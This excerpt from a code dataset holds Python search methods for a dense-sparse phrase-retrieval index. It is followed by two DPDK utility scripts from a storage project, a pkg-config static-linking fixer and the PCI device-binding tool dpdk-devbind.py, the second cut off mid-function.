def dequant(self, group, input_, attr='dense'):
if 'offset' not in group.attrs:
return input_
if attr == 'dense':
return self.int8_to_float(input_, group.attrs['offset'], group.attrs['scale'])
elif attr == 'sparse':
return self.int8_to_float(input_, group.attrs['sparse_offset'], group.attrs['sparse_scale'])
else:
raise NotImplementedError()
def sparse_bmm(self, q_ids, q_vals, p_ids, p_vals):
"""
Efficient batch inner product after slicing (matrix x matrix)
"""
q_max = max([len(q) for q in q_ids])
p_max = max([len(p) for p in p_ids])
factor = len(p_ids)//len(q_ids)
assert q_max == max([len(q) for q in q_vals]) and p_max == max([len(p) for p in p_vals])
with torch.no_grad():
q_ids_pad = torch.LongTensor([q_id.tolist() + [0]*(q_max-len(q_id)) for q_id in q_ids]).to(self.device)
q_ids_pad = q_ids_pad.repeat(1, factor).view(len(p_ids), -1) # Repeat for p
q_vals_pad = torch.FloatTensor([q_val.tolist() + [0]*(q_max-len(q_val)) for q_val in q_vals]).to(self.device)
q_vals_pad = q_vals_pad.repeat(1, factor).view(len(p_vals), -1) # Repeat for p
p_ids_pad = torch.LongTensor([p_id.tolist() + [0]*(p_max-len(p_id)) for p_id in p_ids]).to(self.device)
p_vals_pad = torch.FloatTensor([p_val.tolist() + [0]*(p_max-len(p_val)) for p_val in p_vals]).to(self.device)
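            # broadcast-compare the padded term-id lists to build a match mask, then sum the
            # products of matching term weights: a batched sparse inner product over dense padding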
id_map = q_ids_pad.unsqueeze(1)
id_map_ = p_ids_pad.unsqueeze(2)
match = (id_map == id_map_).to(torch.float32)
val_map = q_vals_pad.unsqueeze(1)
val_map_ = p_vals_pad.unsqueeze(2)
sp_scores = ((val_map * val_map_) * match).sum([1, 2])
return sp_scores.cpu().numpy()
def search_dense(self, q_texts, query_start, start_top_k, nprobe, sparse_weight=0.05):
batch_size = query_start.shape[0]
self.start_index.nprobe = nprobe
# Query concatenation for l2 to ip
query_start = np.concatenate([np.zeros([batch_size, 1]).astype(np.float32), query_start], axis=1)
# Search with faiss
start_scores, I = self.start_index.search(query_start, start_top_k)
query_norm = np.linalg.norm(query_start, ord=2, axis=1)
start_scores = self.scale_l2_to_ip(start_scores, max_norm=self.max_norm, query_norm=np.expand_dims(query_norm, 1))
# Get idxs from resulting I
doc_idxs, start_idxs = self.get_idxs(I)
# For record
num_docs = sum([len(set(doc_idx.flatten().tolist())) for doc_idx in doc_idxs]) / batch_size
self.num_docs_list.append(num_docs)
# Doc-level sparse score
b_doc_scores = self.doc_rank_fn['index'](q_texts, doc_idxs.tolist()) # Index
for b_idx in range(batch_size):
start_scores[b_idx] += np.array(b_doc_scores[b_idx]) * sparse_weight
return (doc_idxs, start_idxs), start_scores
def search_sparse(self, q_texts, query_start, doc_top_k, start_top_k, sparse_weight=0.05):
batch_size = query_start.shape[0]
# Reduce search space by doc scores
top_doc_idxs, top_doc_scores = self.doc_rank_fn['top_docs'](q_texts, doc_top_k) # Top docs
# For each item, add start scores
b_doc_idxs = []
b_start_idxs = []
b_scores = []
max_phrases = 0
for b_idx in range(batch_size):
doc_idxs = []
start_idxs = []
scores = []
for doc_idx, doc_score in zip(top_doc_idxs[b_idx], top_doc_scores[b_idx]):
try:
doc_group = self.get_doc_group(doc_idx)
except ValueError:
continue
start = self.dequant(doc_group, doc_group['start'][:])
cur_scores = np.sum(query_start[b_idx] * start, 1)
for i, cur_score in enumerate(cur_scores):
doc_idxs.append(doc_idx)
start_idxs.append(i)
scores.append(cur_score + sparse_weight * doc_score)
max_phrases = len(scores) if len(scores) > max_phrases else max_phrases
b_doc_idxs.append(doc_idxs)
b_start_idxs.append(start_idxs)
b_scores.append(scores)
# If start_top_k is larger than nonnegative doc_idxs, we need to cut them later
for doc_idxs, start_idxs, scores in zip(b_doc_idxs, b_start_idxs, b_scores):
doc_idxs += [-1] * (max_phrases - len(doc_idxs))
start_idxs += [-1] * (max_phrases - len(start_idxs))
scores += [-10**9] * (max_phrases - len(scores))
doc_idxs, start_idxs, scores = np.stack(b_doc_idxs), np.stack(b_start_idxs), np.stack(b_scores)
return (doc_idxs, start_idxs), scores
def batch_par_scores(self, q_texts, q_sparses, doc_idxs, start_idxs, sparse_weight=0.05, mid_top_k=100):
# Reshape for sparse
num_queries = len(q_texts)
doc_idxs = np.reshape(doc_idxs, [-1])
start_idxs = np.reshape(start_idxs, [-1])
default_doc = [doc_idx for doc_idx in doc_idxs if doc_idx >= 0][0]
groups = [self.get_doc_group(doc_idx) if doc_idx >= 0 else self.get_doc_group(default_doc)
for doc_idx in doc_idxs]
# Calculate paragraph start end location in sparse vector
para_lens = [group['len_per_para'][:] for group in groups]
f2o_start = [group['f2o_start'][:] for group in groups]
para_bounds = [[(sum(para_len[:para_idx]), sum(para_len[:para_idx+1])) for
para_idx in range(len(para_len))] for para_len in para_lens]
para_idxs = []
for para_bound, start_idx, f2o in zip(para_bounds, start_idxs, f2o_start):
para_bound = np.array(para_bound)
curr_idx = ((f2o[start_idx] >= para_bound[:,0]) & (f2o[start_idx] < para_bound[:,1])).nonzero()[0][0]
para_idxs.append(curr_idx)
para_startend = [para_bound[para_idx] for para_bound, para_idx in zip(para_bounds, para_idxs)]
# 1) TF-IDF based paragraph score
q_spvecs = self.doc_rank_fn['spvec'](q_texts) # Spvec
qtf_ids = [np.array(q) for q in q_spvecs[1]]
qtf_vals = [np.array(q) for q in q_spvecs[0]]
tfidf_groups = [self.get_tfidf_group(doc_idx) if doc_idx >= 0 else self.get_tfidf_group(default_doc)
for doc_idx in doc_idxs]
tfidf_groups = [group[str(para_idx)] for group, para_idx in zip(tfidf_groups, para_idxs)]
ptf_ids = [data['idxs'][:] for data in tfidf_groups]
ptf_vals = [data['vals'][:] for data in tfidf_groups]
tf_scores = self.sparse_bmm(qtf_ids, qtf_vals, ptf_ids, ptf_vals) * sparse_weight
# 2) Sparse vectors based paragraph score
q_ids, q_unis, q_bis = q_sparses
q_ids = [np.array(q) for q in q_ids]
q_unis = [np.array(q) for q in q_unis]
q_bis = [np.array(q)[:-1] for q in q_bis]
p_ids_tmp = [group['input_ids'][:] for group in groups]
p_unis_tmp = [group['sparse'][:, :] for group in groups]
p_bis_tmp = [group['sparse_bi'][:, :] for group in groups]
p_ids = [sparse_id[p_se[0]:p_se[1]]
for sparse_id, p_se in zip(p_ids_tmp, para_startend)]
p_unis = [self.dequant(groups[0], sparse_val[start_idx,:p_se[1]-p_se[0]], attr='sparse')
for sparse_val, p_se, start_idx in zip(p_unis_tmp, para_startend, start_idxs)]
p_bis = [self.dequant(groups[0], sparse_bi_val[start_idx,:p_se[1]-p_se[0]-1], attr='sparse')
for sparse_bi_val, p_se, start_idx in zip(p_bis_tmp, para_startend, start_idxs)]
sp_scores = self.sparse_bmm(q_ids, q_unis, p_ids, p_unis)
# For bigram
MAXV = 30522
q_bids = [np.array([a*MAXV+b for a, b in zip(q_id[:-1], q_id[1:])]) for q_id in q_ids]
p_bids = [np.array([a*MAXV+b for a, b in zip(p_id[:-1], p_id[1:])]) for p_id in p_ids]
sp_scores += self.sparse_bmm(q_bids, q_bis, p_bids, p_bis)
return np.reshape(tf_scores + sp_scores, [num_queries, -1])
def search_start(self, query_start, sparse_query, q_texts=None,
nprobe=16, doc_top_k=5, start_top_k=100, mid_top_k=20, top_k=5,
search_strategy='dense_first', sparse_weight=0.05, no_para=False):
assert self.start_index is not None
query_start = query_start.astype(np.float32)
batch_size = query_start.shape[0]
# start_time = time()
# 1) Branch based on the strategy (start_top_k) + doc_score
if search_strategy == 'dense_first':
(doc_idxs, start_idxs), start_scores = self.search_dense(
q_texts, query_start, start_top_k, nprobe, sparse_weight
)
elif search_strategy == 'sparse_first':
(doc_idxs, start_idxs), start_scores = self.search_sparse(
q_texts, query_start, doc_top_k, start_top_k, sparse_weight
)
elif search_strategy == 'hybrid':
(doc_idxs, start_idxs), start_scores = self.search_dense(
q_texts, query_start, start_top_k, nprobe, sparse_weight
)
(doc_idxs_, start_idxs_), start_scores_ = self.search_sparse(
q_texts, query_start, doc_top_k, start_top_k, sparse_weight
)
# There could be a duplicate but it's difficult to remove
doc_idxs = np.concatenate([doc_idxs, doc_idxs_], -1)
start_idxs = np.concatenate([start_idxs, start_idxs_], -1)
start_scores = np.concatenate([start_scores, start_scores_], -1)
else:
raise ValueError(search_strategy)
# 2) Rerank and reduce (mid_top_k)
rerank_idxs = np.argsort(start_scores, axis=1)[:,-mid_top_k:][:,::-1]
doc_idxs = doc_idxs.tolist()
start_idxs = start_idxs.tolist()
start_scores = start_scores.tolist()
for b_idx in range(batch_size):
doc_idxs[b_idx] = np.array(doc_idxs[b_idx])[rerank_idxs[b_idx]]
start_idxs[b_idx] = np.array(start_idxs[b_idx])[rerank_idxs[b_idx]]
start_scores[b_idx] = np.array(start_scores[b_idx])[rerank_idxs[b_idx]]
# logger.info(f'1st rerank ({start_top_k} => {mid_top_k}), {np.array(start_scores).shape}, {time()-start_time}')
# start_time = time()
# Para-level sparse score
if not no_para:
par_scores = self.batch_par_scores(q_texts, sparse_query, doc_idxs, start_idxs, sparse_weight, mid_top_k)
start_scores = np.stack(start_scores) + par_scores
start_scores = [s for s in start_scores]
# 3) Rerank and reduce (top_k)
rerank_idxs = np.argsort(start_scores, axis=1)[:,-top_k:][:,::-1]
for b_idx in range(batch_size):
doc_idxs[b_idx] = doc_idxs[b_idx][rerank_idxs[b_idx]]
start_idxs[b_idx] = start_idxs[b_idx][rerank_idxs[b_idx]]
start_scores[b_idx] = start_scores[b_idx][rerank_idxs[b_idx]]
doc_idxs = np.stack(doc_idxs)
start_idxs = np.stack(start_idxs)
start_scores = np.stack(start_scores)
# logger.info(f'2nd rerank ({mid_top_k} => {top_k}), {start_scores.shape}, {time()-start_time}')
return start_scores, doc_idxs, start_idxs
def search_end(self, query, doc_idxs, start_idxs, start_scores=None, top_k=5, max_answer_length=20):
# Reshape for end
num_queries = query.shape[0]
query = np.reshape(np.tile(np.expand_dims(query, 1), [1, top_k, 1]), [-1, query.shape[1]])
q_idxs = np.reshape(np.tile(np.expand_dims(np.arange(num_queries), 1), [1, top_k]), [-1])
doc_idxs = np.reshape(doc_idxs, [-1])
start_idxs = np.reshape(start_idxs, [-1])
start_scores = np.reshape(start_scores, [-1])
# Get query_end and groups
bs = int((query.shape[1] - 1) / 2) # Boundary of start
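        # query vector layout: [start embedding | end embedding | span logit]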
query_end, query_span_logit = query[:,bs:2*bs], query[:,-1:]
default_doc = [doc_idx for doc_idx in doc_idxs if doc_idx >= 0][0]
groups = [self.get_doc_group(doc_idx) if doc_idx >= 0 else self.get_doc_group(default_doc)
for doc_idx in doc_idxs]
ends = [group['end'][:] for group in groups]
spans = [group['span_logits'][:] for group in groups]
default_end = np.zeros(bs).astype(np.float32)
# Calculate end
end_idxs = [group['start2end'][start_idx, :max_answer_length]
for group, start_idx in zip(groups, start_idxs)] # [Q, L]
end_mask = -1e9 * (np.array(end_idxs) < 0) # [Q, L]
end = np.stack([[each_end[each_end_idx, :] if each_end.size > 0 else default_end
for each_end_idx in each_end_idxs]
for each_end, each_end_idxs in zip(ends, end_idxs)], 0) # [Q, L, d]
end = self.dequant(groups[0], end)
span = np.stack([[each_span[start_idx, i] for i in range(len(each_end_idxs))]
for each_span, start_idx, each_end_idxs in zip(spans, start_idxs, end_idxs)], 0) # [Q, L]
with torch.no_grad():
end = torch.FloatTensor(end).to(self.device)
query_end = torch.FloatTensor(query_end).to(self.device)
end_scores = (query_end.unsqueeze(1) * end).sum(2).cpu().numpy()
span_scores = query_span_logit * span # [Q, L]
scores = np.expand_dims(start_scores, 1) + end_scores + span_scores + end_mask # [Q, L]
pred_end_idxs = np.stack([each[idx] for each, idx in zip(end_idxs, np.argmax(scores, 1))], 0) # [Q]
max_scores = np.max(scores, 1)
# Get answers
out = [{'context': group.attrs['context'], 'title': group.attrs['title'], 'doc_idx': doc_idx,
'start_pos': group['word2char_start'][group['f2o_start'][start_idx]].item(),
'end_pos': (group['word2char_end'][group['f2o_end'][end_idx]].item() if len(group['word2char_end']) > 0
else group['word2char_start'][group['f2o_start'][start_idx]].item() + 1),
'start_idx': start_idx, 'end_idx': end_idx, 'score': score}
for doc_idx, group, start_idx, end_idx, score in zip(doc_idxs.tolist(), groups, start_idxs.tolist(),
pred_end_idxs.tolist(), max_scores.tolist())]
for each in out:
each['answer'] = each['context'][each['start_pos']:each['end_pos']]
out = [self.adjust(each) for each in out]
# Sort output
new_out = [[] for _ in range(num_queries)]
for idx, each_out in zip(q_idxs, out):
new_out[idx].append(each_out)
for i in range(len(new_out)):
new_out[i] = sorted(new_out[i], key=lambda each_out: -each_out['score'])
new_out[i] = list(filter(lambda x: x['score'] > -1e5, new_out[i])) # In case of no output but masks
return new_out
def filter_results(self, results):
out = []
for result in results:
c = Counter(result['context'])
if c['?'] > 3:
continue
if c['!'] > 5:
continue
out.append(result)
return out
def search(self, query, sparse_query, q_texts=None,
nprobe=256, doc_top_k=5, start_top_k=1000, mid_top_k=100, top_k=10,
search_strategy='dense_first', filter_=False, aggregate=False, return_idxs=False,
max_answer_length=20, sparse_weight=0.05, no_para=False):
# Search start
start_scores, doc_idxs, start_idxs = self.search_start(
query[:, :int((query.shape[1] -1) / 2)],
sparse_query,
q_texts=q_texts,
nprobe=nprobe,
doc_top_k=doc_top_k,
start_top_k=start_top_k,
mid_top_k=mid_top_k,
top_k=top_k,
search_strategy=search_strategy,
sparse_weight=sparse_weight,
no_para=no_para,
)
# start_time = time()
# Search end
outs = self.search_end(
query, doc_idxs, start_idxs, start_scores=start_scores,
top_k=top_k, max_answer_length=max_answer_length
)
# logger.info(f'last rerank ({top_k}), {len(outs)}, {time()-start_time}')
if filter_:
outs = [self.filter_results(results) for results in outs]
if return_idxs:
return [[(out_['doc_idx'], out_['start_idx'], out_['end_idx'], out_['answer']) for out_ in out ] for out in outs]
if doc_idxs.shape[1] != top_k:
logger.info(f"Warning.. {doc_idxs.shape[1]} only retrieved")
top_k = doc_idxs.shape[1]
return outs
``` |
{
"source": "jhyunleehi/poseidonos",
"score": 2
} |
#### File: buildtools/pkg-config/set-static-linker-flags.py
```python
import os
import sys
def fix_ldflag(f):
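    # rewrite '-lrte_xyz' into '-l:librte_xyz.a' so the linker picks the static archive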
if not f.startswith('-lrte_'):
return f
return '-l:lib' + f[2:] + '.a'
def fix_libs_private(line):
if not line.startswith('Libs.private'):
return line
ldflags = [fix_ldflag(flag) for flag in line.split()]
return ' '.join(ldflags) + '\n'
def process_pc_file(filepath):
print('Processing', filepath)
with open(filepath) as src:
lines = src.readlines()
with open(filepath, 'w') as dst:
dst.writelines([fix_libs_private(line) for line in lines])
if 'MESON_BUILD_ROOT' not in os.environ:
print('This script must be called from a meson build environment')
sys.exit(1)
for root, dirs, files in os.walk(os.environ['MESON_BUILD_ROOT']):
pc_files = [f for f in files if f.endswith('.pc')]
for f in pc_files:
process_pc_file(os.path.join(root, f))
```
#### File: dpdk-20.08/usertools/dpdk-devbind.py
```python
from __future__ import print_function
import sys
import os
import getopt
import subprocess
from os.path import exists, abspath, dirname, basename
if sys.version_info.major < 3:
print("WARNING: Python 2 is deprecated for use in DPDK, and will not work in future releases.", file=sys.stderr)
print("Please use Python 3 instead", file=sys.stderr)
# The PCI base class for all devices
network_class = {'Class': '02', 'Vendor': None, 'Device': None,
'SVendor': None, 'SDevice': None}
acceleration_class = {'Class': '12', 'Vendor': None, 'Device': None,
'SVendor': None, 'SDevice': None}
ifpga_class = {'Class': '12', 'Vendor': '8086', 'Device': '0b30',
'SVendor': None, 'SDevice': None}
encryption_class = {'Class': '10', 'Vendor': None, 'Device': None,
'SVendor': None, 'SDevice': None}
intel_processor_class = {'Class': '0b', 'Vendor': '8086', 'Device': None,
'SVendor': None, 'SDevice': None}
cavium_sso = {'Class': '08', 'Vendor': '177d', 'Device': 'a04b,a04d',
'SVendor': None, 'SDevice': None}
cavium_fpa = {'Class': '08', 'Vendor': '177d', 'Device': 'a053',
'SVendor': None, 'SDevice': None}
cavium_pkx = {'Class': '08', 'Vendor': '177d', 'Device': 'a0dd,a049',
'SVendor': None, 'SDevice': None}
cavium_tim = {'Class': '08', 'Vendor': '177d', 'Device': 'a051',
'SVendor': None, 'SDevice': None}
cavium_zip = {'Class': '12', 'Vendor': '177d', 'Device': 'a037',
'SVendor': None, 'SDevice': None}
avp_vnic = {'Class': '05', 'Vendor': '1af4', 'Device': '1110',
'SVendor': None, 'SDevice': None}
octeontx2_sso = {'Class': '08', 'Vendor': '177d', 'Device': 'a0f9,a0fa',
'SVendor': None, 'SDevice': None}
octeontx2_npa = {'Class': '08', 'Vendor': '177d', 'Device': 'a0fb,a0fc',
'SVendor': None, 'SDevice': None}
octeontx2_dma = {'Class': '08', 'Vendor': '177d', 'Device': 'a081',
'SVendor': None, 'SDevice': None}
intel_ioat_bdw = {'Class': '08', 'Vendor': '8086', 'Device': '6f20,6f21,6f22,6f23,6f24,6f25,6f26,6f27,6f2e,6f2f',
'SVendor': None, 'SDevice': None}
intel_ioat_skx = {'Class': '08', 'Vendor': '8086', 'Device': '2021',
'SVendor': None, 'SDevice': None}
intel_ioat_icx = {'Class': '08', 'Vendor': '8086', 'Device': '0b00',
'SVendor': None, 'SDevice': None}
intel_ntb_skx = {'Class': '06', 'Vendor': '8086', 'Device': '201c',
'SVendor': None, 'SDevice': None}
network_devices = [network_class, cavium_pkx, avp_vnic, ifpga_class]
baseband_devices = [acceleration_class]
crypto_devices = [encryption_class, intel_processor_class]
eventdev_devices = [cavium_sso, cavium_tim, octeontx2_sso]
mempool_devices = [cavium_fpa, octeontx2_npa]
compress_devices = [cavium_zip]
misc_devices = [intel_ioat_bdw, intel_ioat_skx, intel_ioat_icx, intel_ntb_skx, octeontx2_dma]
# global dict ethernet devices present. Dictionary indexed by PCI address.
# Each device within this is itself a dictionary of device properties
devices = {}
# list of supported DPDK drivers
dpdk_drivers = ["igb_uio", "vfio-pci", "uio_pci_generic"]
# list of currently loaded kernel modules
loaded_modules = None
# command-line arg flags
b_flag = None
status_flag = False
force_flag = False
args = []
def usage():
'''Print usage information for the program'''
argv0 = basename(sys.argv[0])
print("""
Usage:
------
%(argv0)s [options] DEVICE1 DEVICE2 ....
where DEVICE1, DEVICE2 etc, are specified via PCI "domain:bus:slot.func" syntax
or "bus:slot.func" syntax. For devices bound to Linux kernel drivers, they may
also be referred to by Linux interface name e.g. eth0, eth1, em0, em1, etc.
Options:
--help, --usage:
Display usage information and quit
-s, --status:
Print the current status of all known network, crypto, event
and mempool devices.
For each device, it displays the PCI domain, bus, slot and function,
along with a text description of the device. Depending upon whether the
device is being used by a kernel driver, the igb_uio driver, or no
driver, other relevant information will be displayed:
* the Linux interface name e.g. if=eth0
* the driver being used e.g. drv=igb_uio
* any suitable drivers not currently using that device
e.g. unused=igb_uio
NOTE: if this flag is passed along with a bind/unbind option, the
status display will always occur after the other operations have taken
place.
--status-dev:
Print the status of given device group. Supported device groups are:
"net", "baseband", "crypto", "event", "mempool" and "compress"
-b driver, --bind=driver:
Select the driver to use or \"none\" to unbind the device
-u, --unbind:
Unbind a device (Equivalent to \"-b none\")
--force:
By default, network devices which are used by Linux - as indicated by
having routes in the routing table - cannot be modified. Using the
--force flag overrides this behavior, allowing active links to be
forcibly unbound.
WARNING: This can lead to loss of network connection and should be used
with caution.
Examples:
---------
To display current device status:
%(argv0)s --status
To display current network device status:
%(argv0)s --status-dev net
To bind eth1 from the current driver and move to use igb_uio
%(argv0)s --bind=igb_uio eth1
To unbind 0000:01:00.0 from using any driver
%(argv0)s -u 0000:01:00.0
To bind 0000:02:00.0 and 0000:02:00.1 to the ixgbe kernel driver
%(argv0)s -b ixgbe 02:00.0 02:00.1
""" % locals()) # replace items from local variables
# This is roughly compatible with check_output function in subprocess module
# which is only available in python 2.7.
def check_output(args, stderr=None):
'''Run a command and capture its output'''
return subprocess.Popen(args, stdout=subprocess.PIPE,
stderr=stderr).communicate()[0]
# check if a specific kernel module is loaded
def module_is_loaded(module):
global loaded_modules
if module == 'vfio_pci':
module = 'vfio-pci'
if loaded_modules:
return module in loaded_modules
# Get list of sysfs modules (both built-in and dynamically loaded)
sysfs_path = '/sys/module/'
# Get the list of directories in sysfs_path
sysfs_mods = [m for m in os.listdir(sysfs_path)
if os.path.isdir(os.path.join(sysfs_path, m))]
# special case for vfio_pci (module is named vfio-pci,
# but its .ko is named vfio_pci)
sysfs_mods = [a if a != 'vfio_pci' else 'vfio-pci' for a in sysfs_mods]
loaded_modules = sysfs_mods
return module in sysfs_mods
def check_modules():
'''Checks that igb_uio is loaded'''
global dpdk_drivers
# list of supported modules
mods = [{"Name": driver, "Found": False} for driver in dpdk_drivers]
# first check if module is loaded
for mod in mods:
if module_is_loaded(mod["Name"]):
mod["Found"] = True
# check if we have at least one loaded module
if True not in [mod["Found"] for mod in mods] and b_flag is not None:
print("Warning: no supported DPDK kernel modules are loaded", file=sys.stderr)
# change DPDK driver list to only contain drivers that are loaded
dpdk_drivers = [mod["Name"] for mod in mods if mod["Found"]]
def has_driver(dev_id):
'''return true if a device is assigned to a driver. False otherwise'''
return "Driver_str" in devices[dev_id]
def get_pci_device_details(dev_id, probe_lspci):
'''This function gets additional details for a PCI device'''
device = {}
if probe_lspci:
extra_info = check_output(["lspci", "-vmmks", dev_id]).splitlines()
# parse lspci details
for line in extra_info:
if len(line) == 0:
continue
name, value = line.decode("utf8").split("\t", 1)
name = name.strip(":") + "_str"
device[name] = value
# check for a unix interface name
device["Interface"] = ""
for base, dirs, _ in os.walk("/sys/bus/pci/devices/%s/" % dev_id):
if "net" in dirs:
device["Interface"] = \
",".join(os.listdir(os.path.join(base, "net")))
break
# check if a port is used for ssh connection
device["Ssh_if"] = False
device["Active"] = ""
return device
def clear_data():
'''This function clears any old data'''
global devices
devices = {}
def get_device_details(devices_type):
'''This function populates the "devices" dictionary. The keys used are
the pci addresses (domain:bus:slot.func). The values are themselves
dictionaries - one for each NIC.'''
global devices
global dpdk_drivers
# first loop through and read details for all devices
# request machine readable format, with numeric IDs and String
dev = {}
dev_lines = check_output(["lspci", "-Dvmmnnk"]).splitlines()
for dev_line in dev_lines:
if len(dev_line) == 0:
if device_type_match(dev, devices_type):
# Replace "Driver" with "Driver_str" to have consistency of
# of dictionary key names
if "Driver" in dev.keys():
dev["Driver_str"] = dev.pop("Driver")
if "Module" in dev.keys():
dev["Module_str"] = dev.pop("Module")
# use dict to make copy of dev
devices[dev["Slot"]] = dict(dev)
# Clear previous device's data
dev = {}
else:
name, value = dev_line.decode("utf8").split("\t", 1)
value_list = value.rsplit(' ', 1)
if len(value_list) > 1:
# String stored in <name>_str
dev[name.rstrip(":") + '_str'] = value_list[0]
# Numeric IDs
dev[name.rstrip(":")] = value_list[len(value_list) - 1] \
.rstrip("]").lstrip("[")
if devices_type == network_devices:
# check what is the interface if any for an ssh connection if
# any to this host, so we can mark it later.
ssh_if = []
route = check_output(["ip", "-o", "route"])
# filter out all lines for 169.254 routes
route = "\n".join(filter(lambda ln: not ln.startswith("169.254"),
route.decode().splitlines()))
rt_info = route.split()
for i in range(len(rt_info) - 1):
if rt_info[i] == "dev":
ssh_if.append(rt_info[i+1])
# based on the basic info, get extended text details
for d in devices.keys():
if not device_type_match(devices[d], devices_type):
continue
# get additional info and add it to existing data
devices[d] = devices[d].copy()
# No need to probe lspci
devices[d].update(get_pci_device_details(d, False).items())
if devices_type == network_devices:
for _if in ssh_if:
if _if in devices[d]["Interface"].split(","):
devices[d]["Ssh_if"] = True
devices[d]["Active"] = "*Active*"
break
# add igb_uio to list of supporting modules if needed
if "Module_str" in devices[d]:
for driver in dpdk_drivers:
if driver not in devices[d]["Module_str"]:
devices[d]["Module_str"] = \
devices[d]["Module_str"] + ",%s" % driver
else:
devices[d]["Module_str"] = ",".join(dpdk_drivers)
# make sure the driver and module strings do not have any duplicates
if has_driver(d):
modules = devices[d]["Module_str"].split(",")
if devices[d]["Driver_str"] in modules:
modules.remove(devices[d]["Driver_str"])
devices[d]["Module_str"] = ",".join(modules)
def device_type_match(dev, devices_type):
for i in range(len(devices_type)):
param_count = len(
[x for x in devices_type[i].values() if x is not None])
match_count = 0
if dev["Class"][0:2] == devices_type[i]["Class"]:
match_count = match_count + 1
for key in devices_type[i].keys():
if key != 'Class' and devices_type[i][key]:
value_list = devices_type[i][key].split(',')
for value in value_list:
if value.strip(' ') == dev[key]:
match_count = match_count + 1
# count must be the number of non None parameters to match
if match_count == param_count:
return True
return False
def dev_id_from_dev_name(dev_name):
'''Take a device "name" - a string passed in by user to identify a NIC
device, and determine the device id - i.e. the domain:bus:slot.func - for
it, which can then be used to index into the devices array'''
# check if it's already a suitable index
if dev_name in devices:
return dev_name
# check if it's an index just missing the domain part
elif "0000:" + dev_name in devices:
return "0000:" + dev_name
else:
# check if it's an interface name, e.g. eth1
for d in devices.keys():
if dev_name in devices[d]["Interface"].split(","):
return devices[d]["Slot"]
# if nothing else matches - error
raise ValueError("Unknown device: %s. "
"Please specify device in \"bus:slot.func\" format" % dev_name)
def unbind_one(dev_id, force):
'''Unbind the device identified by "dev_id" from its current driver'''
dev = devices[dev_id]
if not has_driver(dev_id):
print("Notice: %s %s %s is not currently managed by any driver" %
(dev["Slot"], dev["Device_str"], dev["Interface"]), file=sys.stderr)
return
# prevent us disconnecting ourselves
if dev["Ssh_if"] and not force:
print("Warning: routing table indicates that interface %s is active. "
"Skipping unbind" % dev_id, file=sys.stderr)
return
# write to /sys to unbind
filename = "/sys/bus/pci/drivers/%s/unbind" % dev["Driver_str"]
try:
f = open(filename, "a")
except:
sys.exit("Error: unbind failed for %s - Cannot open %s" %
(dev_id, filename))
f.write(dev_id)
f.close()
def bind_one(dev_id, driver, force):
'''Bind the device given by "dev_id" to the driver "driver". If the device
is already bound to a different driver, it will be unbound first'''
dev = devices[dev_id]
saved_driver = None # used to rollback any unbind in case of failure
# prevent disconnection of our ssh session
if dev["Ssh_if"] and not force:
print("Warning: routing table indicates that interface %s is active. "
"Not modifying" % dev_id, file=sys.stderr)
return
# unbind any existing drivers we don't want
if has_driver(dev_id):
if dev["Driver_str"] == driver:
print("Notice: %s already bound to driver %s, skipping" %
(dev_id, driver), file=sys.stderr)
return
else:
saved_driver = dev["Driver_str"]
unbind_one(dev_id, force)
dev["Driver_str"] = "" # clear driver string
# For kernels >= 3.15 driver_override can be used to specify the driver
# for a device rather than relying on the driver to provide a positive
# match of the device. The existing process of looking up
# the vendor and device ID, adding them to the driver new_id,
# will erroneously bind other devices too which has the additional burden
# of unbinding those devices
if driver in dpdk_drivers:
filename = "/sys/bus/pci/devices/%s/driver_override" % dev_id
if os.path.exists(filename):
try:
f = open(filename, "w")
except:
print("Error: bind failed for %s - Cannot open %s"
% (dev_id, filename), file=sys.stderr)
return
try:
f.write("%s" % driver)
f.close()
except:
print("Error: bind failed for %s - Cannot write driver %s to "
"PCI ID " % (dev_id, driver), file=sys.stderr)
return
# For kernels < 3.15 use new_id to add PCI id's to the driver
else:
filename = "/sys/bus/pci/drivers/%s/new_id" % driver
try:
f = open(filename, "w")
except:
print("Error: bind failed for %s - Cannot open %s"
% (dev_id, filename), file=sys.stderr)
return
try:
# Convert Device and Vendor Id to int to write to new_id
f.write("%04x %04x" % (int(dev["Vendor"],16),
int(dev["Device"], 16)))
f.close()
except:
print("Error: bind failed for %s - Cannot write new PCI ID to "
"driver %s" % (dev_id, driver), file=sys.stderr)
return
# do the bind by writing to /sys
filename = "/sys/bus/pci/drivers/%s/bind" % driver
try:
f = open(filename, "a")
except:
print("Error: bind failed for %s - Cannot open %s"
% (dev_id, filename), file=sys.stderr)
if saved_driver is not None: # restore any previous driver
bind_one(dev_id, saved_driver, force)
return
try:
f.write(dev_id)
f.close()
except:
# for some reason, closing dev_id after adding a new PCI ID to new_id
# results in IOError. however, if the device was successfully bound,
# we don't care for any errors and can safely ignore IOError
tmp = get_pci_device_details(dev_id, True)
if "Driver_str" in tmp and tmp["Driver_str"] == driver:
return
print("Error: bind failed for %s - Cannot bind to driver %s"
% (dev_id, driver), file=sys.stderr)
if saved_driver is not None: # restore any previous driver
bind_one(dev_id, saved_driver, force)
return
# For kernels > 3.15 driver_override is used to bind a device to a driver.
# Before unbinding it, overwrite driver_override with empty string so that
# the device can be bound to any other driver
filename = "/sys/bus/pci/devices/%s/driver_override" % dev_id
if os.path.exists(filename):
try:
f = open(filename, "w")
except:
sys.exit("Error: unbind failed for %s - Cannot open %s"
% (dev_id, filename))
try:
f.write("\00")
f.close()
except:
sys.exit("Error: unbind failed for %s - Cannot open %s"
% (dev_id, filename))
def unbind_all(dev_list, force=False):
"""Unbind method, takes a list of device locations"""
if dev_list[0] == "dpdk":
for d in devices.keys():
if "Driver_str" in devices[d]:
if devices[d]["Driver_str"] in dpdk_drivers:
unbind_one(devices[d]["Slot"], force)
return
try:
        # materialise the list so a bad device name raises here, inside the try
        dev_list = list(map(dev_id_from_dev_name, dev_list))
except ValueError as ex:
print(ex)
sys.exit(1)
for d in dev_list:
unbind_one(d, force)
def bind_all(dev_list, driver, force=False):
"""Bind method, takes a list of device locations"""
global devices
# a common user error is to forget to specify the driver the devices need to
# be bound to. check if the driver is a valid device, and if it is, show
# a meaningful error.
try:
dev_id_from_dev_name(driver)
# if we've made it this far, this means that the "driver" was a valid
# device string, so it's probably not a valid driver name.
sys.exit("Error: Driver '%s' does not look like a valid driver. " \
"Did you forget to specify the driver to bind devices to?" % driver)
except ValueError:
# driver generated error - it's not a valid device ID, so all is well
pass
# check if we're attempting to bind to a driver that isn't loaded
if not module_is_loaded(driver.replace('-','_')):
sys.exit("Error: Driver '%s' is not loaded." % driver)
try:
        # materialise the list so errors surface here and the later membership
        # test ("d in dev_list") keeps working after iteration
        dev_list = list(map(dev_id_from_dev_name, dev_list))
